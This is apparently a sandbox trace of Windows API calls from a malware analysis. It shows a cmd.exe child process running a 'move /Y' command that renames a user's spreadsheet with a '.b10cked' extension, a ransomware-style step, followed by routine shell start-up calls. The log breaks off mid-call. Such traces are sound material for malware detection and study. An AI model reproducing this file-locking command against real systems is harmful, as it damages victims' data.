[0133.815] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.815] GetEnvironmentStringsW () returned 0x3c3808* [0133.815] FreeEnvironmentStringsW (penv=0x3c3808) returned 1 [0133.815] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0133.887] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef238 | out: lpExitCode=0x2ef238*=0x0) returned 1 [0133.887] CloseHandle (hObject=0x50) returned 1 [0133.887] _vsnwprintf (in: _Buffer=0x2ef380, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef244 | out: _Buffer="00000000") returned 8 [0133.887] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.887] GetEnvironmentStringsW () returned 0x3c3808* [0133.887] FreeEnvironmentStringsW (penv=0x3c3808) returned 1 [0133.887] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.887] GetEnvironmentStringsW () returned 0x3c3808* [0133.887] FreeEnvironmentStringsW (penv=0x3c3808) returned 1 [0133.888] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef29c | out: lpAttributeList=0x2ef29c) [0133.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.888] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.889] SetConsoleInputExeNameW () returned 0x1 [0133.889] GetConsoleOutputCP () returned 0x1b5 [0133.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.889] exit (_Code=0) Process: id = "122" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12807 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12808 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12809 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12810 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 12811 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12812 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12813 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12814 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12815 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 12816 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12837 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12838 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12839 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12840 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 12841 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 12842 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12843 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12844 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12845 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12846 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12847 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12848 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12849 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12850 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12851 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12852 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12853 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12854 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12855 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12856 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 12857 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12858 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 12859 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 12860 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 178 os_tid = 0xa38 [0133.236] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbec | out: lpSystemTimeAsFileTime=0x1cfbec*(dwLowDateTime=0x8959f620, dwHighDateTime=0x1d440a9)) [0133.236] GetCurrentProcessId () returned 0xbbc [0133.236] GetCurrentThreadId () returned 0xa38 [0133.236] GetTickCount () returned 0x2a562 [0133.236] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfbe4 | out: lpPerformanceCount=0x1cfbe4*=19002519657) returned 1 [0133.236] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0133.237] __set_app_type (_Type=0x1) [0133.237] __p__fmode () returned 0x76b331f4 [0133.237] __p__commode () returned 0x76b331fc [0133.237] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0133.237] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0133.237] GetCurrentThreadId () returned 0xa38 [0133.237] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa38) returned 0x38 [0133.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.237] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0133.237] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.237] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.237] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfb7c | out: phkResult=0x1cfb7c*=0x0) returned 0x2 [0133.237] VirtualQuery (in: lpAddress=0x1cfbb3, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.238] GetConsoleOutputCP () returned 0x1b5 [0133.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.238] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0133.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.238] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.238] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.239] GetEnvironmentStringsW () returned 0x2e01c8* [0133.239] FreeEnvironmentStringsW (penv=0x2e01c8) returned 1 [0133.239] GetEnvironmentStringsW () returned 0x2e01c8* [0133.239] FreeEnvironmentStringsW (penv=0x2e01c8) returned 1 [0133.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceaec | out: phkResult=0x1ceaec*=0x40) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x0, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x0, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegCloseKey (hKey=0x40) returned 0x0 [0133.239] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceaec | out: phkResult=0x1ceaec*=0x40) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x0, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x9, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x9, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.240] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x9, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.240] RegCloseKey (hKey=0x40) returned 0x0 [0133.240] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0133.240] srand (_Seed=0x5b886367) [0133.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"" [0133.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"" [0133.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.240] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0133.240] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.240] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.240] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.240] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.240] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.240] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.240] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.240] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.240] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.240] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.240] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.240] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.241] GetEnvironmentStringsW () returned 0x2e2318* [0133.241] FreeEnvironmentStringsW (penv=0x2e2318) returned 1 [0133.241] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.241] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.241] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.241] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.241] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.241] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.241] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.241] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.241] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.241] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf8b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.241] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf8b8, lpFilePart=0x1cf8b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf8b4*="Desktop") returned 0x18 [0133.241] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.241] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf634 | out: lpFindFileData=0x1cf634) returned 0x2e0058 [0133.241] FindClose (in: hFindFile=0x2e0058 | out: hFindFile=0x2e0058) returned 1 [0133.241] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf634 | out: lpFindFileData=0x1cf634) returned 0x2e0058 [0133.241] FindClose (in: hFindFile=0x2e0058 | out: hFindFile=0x2e0058) returned 1 [0133.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf634 | out: lpFindFileData=0x1cf634) returned 0x2e0058 [0133.242] FindClose (in: hFindFile=0x2e0058 | out: hFindFile=0x2e0058) returned 1 [0133.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.242] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0133.242] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0133.242] GetEnvironmentStringsW () returned 0x2e2b38* [0133.242] FreeEnvironmentStringsW (penv=0x2e2b38) returned 1 [0133.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.242] GetConsoleOutputCP () returned 0x1b5 [0133.242] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.242] GetUserDefaultLCID () returned 0x409 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf9f8, cchData=128 | out: lpLCData="0") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf9f8, cchData=128 | out: lpLCData="0") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf9f8, cchData=128 | out: lpLCData="1") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0133.243] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.244] GetConsoleTitleW (in: lpConsoleTitle=0x2d0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.244] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0133.244] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0133.244] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0133.245] _wcsicmp (_String1="move", _String2=")") returned 68 [0133.245] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0133.245] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0133.245] _wcsicmp (_String1="IF", _String2="move") returned -4 [0133.245] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0133.245] _wcsicmp (_String1="REM", _String2="move") returned 5 [0133.245] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0133.248] GetConsoleTitleW (in: lpConsoleTitle=0x1cf6f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.249] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0133.249] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="CD") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="REN") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="SET") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0133.249] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0133.249] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0133.249] _wcsicmp (_String1="move", _String2="MD") returned 11 [0133.249] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0133.249] _wcsicmp (_String1="move", _String2="RD") returned -5 [0133.249] _wcsicmp 